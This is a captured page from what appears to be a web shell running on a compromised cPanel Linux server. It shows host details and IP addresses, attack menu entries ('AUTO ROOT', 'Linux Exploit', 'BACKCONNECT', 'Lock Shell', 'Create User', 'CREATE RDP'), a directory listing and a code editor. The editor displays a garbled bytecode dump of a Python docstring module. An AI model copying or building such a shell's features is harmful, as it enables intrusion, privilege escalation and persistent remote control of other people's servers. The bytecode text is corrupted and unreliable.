Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 108.162.241.240
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
gi /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-310.pyc
4.23
KB
-rw-r--r--
_constants.cpython-310.pyc
1.04
KB
-rw-r--r--
_error.cpython-310.pyc
1.42
KB
-rw-r--r--
_gtktemplate.cpython-310.pyc
7.52
KB
-rw-r--r--
_option.cpython-310.pyc
10.5
KB
-rw-r--r--
_ossighelper.cpython-310.pyc
4.98
KB
-rw-r--r--
_propertyhelper.cpython-310.py...
9.94
KB
-rw-r--r--
_signalhelper.cpython-310.pyc
7.77
KB
-rw-r--r--
docstring.cpython-310.pyc
3.77
KB
-rw-r--r--
importer.cpython-310.pyc
3.65
KB
-rw-r--r--
module.cpython-310.pyc
5.16
KB
-rw-r--r--
pygtkcompat.cpython-310.pyc
535
B
-rw-r--r--
types.cpython-310.pyc
7.85
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : docstring.cpython-310.pyc
o ��b] � @ s d dl mZmZmZmZmZmZmZ dadd� Z dd� Z dd� Zi eje �eje�eje�eje�eje�eje�eje�eje�eje�eje�eje�eje�eje�eje�eje�ej e!�ej"e!�ej#e!ej$dej%dej&dej'di�Z(d d � Z)dd� Z*d d� Z+dd� Z,e e,� dS )� )� VFuncInfo�FunctionInfo�CallableInfo� ObjectInfo� StructInfo� Direction�TypeTagNc C s | a dS )z�Set doc string generator function :param callable func: Callable which takes a GIInfoStruct and returns documentation for it. N��_generate_doc_string_func)�func� r �./usr/lib/python3/dist-packages/gi/docstring.py�set_doc_string_generator% s r c C s t S )z6Returns the currently registered doc string generator.r r r r r �get_doc_string_generator/ s r c C s t | �S )aE Generate a doc string given a GIInfoStruct. :param gi.types.BaseInfo info: GI info instance to generate documentation for. :returns: Generated documentation as a string. :rtype: str This passes the info struct to the currently registered doc string generator and returns the result. r ��infor r r �generate_doc_string4 s r c C sf | � � }t�|d �}|rt|d�r|jS |tjkr/| �� }|�� }|s'| � � S d|� � |f S | � � S )N�__name__z%s.%s)�get_tag�_type_tag_to_py_type�get�hasattrr r � INTERFACE� get_interface�get_name�get_tag_as_string� get_namespace)�gi_type�type_tag�py_type�iface� info_namer r r �_get_pytype_hint\ s r"